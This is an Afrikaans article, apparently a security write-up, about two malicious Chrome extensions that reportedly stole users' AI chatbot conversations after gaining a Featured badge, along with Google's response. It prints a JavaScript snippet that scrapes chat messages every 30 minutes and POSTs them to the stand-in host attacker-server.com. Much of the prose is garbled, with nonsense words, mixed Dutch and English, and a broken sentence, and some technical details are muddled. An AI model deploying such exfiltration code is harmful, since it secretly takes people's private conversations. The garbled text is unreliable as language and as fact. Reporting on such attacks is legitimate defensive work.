Die Ontdekking
In Desember 2025 het OX Security twee boos Chrome-uitbreidings gerapporteer:
- "Quick AI Enhancer" — 520,000 gebruikers, Featured Badge
- "Productivity Assistant" — 380,000 gebruikers, 4.8-ster-rating (vals)
Beiden het ChatGPT, Claude, en Gemini-instellinge interkomm vir die voorgaande 6 maande.
Hoe die Featured Badge Gekompromeerd Was
Stap 1: Legitieme Uitbreiding Bou
Die aanvaller het 'n werklik nuttige uitbreiding gebou:
- Kopsafetyto-marker vir AI-gesprekke
- Koppelings-outosamenteller
- Opslaglagstelling
- Gebruikers-resensies was waar (eerste 3 maande)
Stap 2: Google se Evaluasie Oortroef
Chrome Web Store maak uitbreidings "Featured" op grond van:
- Gebruikers-telling
- Positiewe resensies
- Geen malware-sein
- Gebruiks-aanwysing
Die aanvaller het hierdie kriteria oortref:
- 500K+ gebruikers in 3 maande (organieke groei lyk legitiem)
- Botte-resensies met real-account-profiele
- Geen malware-sein in golfas (sloepprofielen)
Stap 3: Kodefinansiering
Sodra die uitbreiding "Featured" was:
- Teruggekom en verborge exfiltration-kode ingebring
- Versieverslag-stooring vir oudere gebruikers (1.0.3)
- Nuwe gebruikers het die skoon weergawe (1.0.1-1.0.2) gehad
- Slegs weergawes 1.0.3+ het die boos kode gehad
Wat die Exfiltration Kode Deed
// Vereenvoudigd weergawe van wat OX Security gevind het
setInterval(() => {
const chats = document.querySelectorAll('[data-test-id="chat-message"]');
const textContent = Array.from(chats)
.map(c => c.innerText)
.join('\n');
fetch('https://attacker-server.com/collect', {
method: 'POST',
body: JSON.stringify({
userId: 'anonymous',
timestamp: Date.now(),
chats: textContent
})
});
}, 1800000); // Elke 30 minute
Waarom Google dit Gemis het
Google Chrome Web Store het 'n malware-ontdekking-proses:
- Sandboxed-uitleiding — Uitbreidings word in 'n soepel-sandbox getoets
- Statiese analise — Kode word gescreend vir verdagte URL's
- Gebruikers-rapportering — Skadelike uitbreidings word aan gebruikers gemeld
Wat misluk het:
- Die exfiltration-URL
attacker-server.comhet voor die featured-keuse as legitiem geplaas - Sandboxed uitvoering het die data-insameling-luslus nie getrigger (geen ChatGPT-tabulering in sandbox)
- Gebruikers-rapportering het traag gewerk (120 dae voordat dit gesluit was)
Google se Reaksie
In Januarie 2026 het Google:
- Al 900K gebruikers waargeskuwd met briek-e-pos
- Featured-badge-proses herskryf — Nauere skaduweis vir externe skakeling
- Weergawe-opdaterings-beperking — Uitbreidings kan slegs 1 weergawe per maand opdateer
- Outosamentelling-gelok — Noodlot-instellings vir chatting-uitgawe
Lesings
- "Featured" beteken nie "veilig" — dit is 'n vertroue-sein, nie 'n sekuriteits-seël
- Reguliere users moet handmatig-evalueer Chrome-uitbreidings voor installasie
- Baan-eksklusiewe uitbreidings — selfs populêre uitgawe kan kompromieert word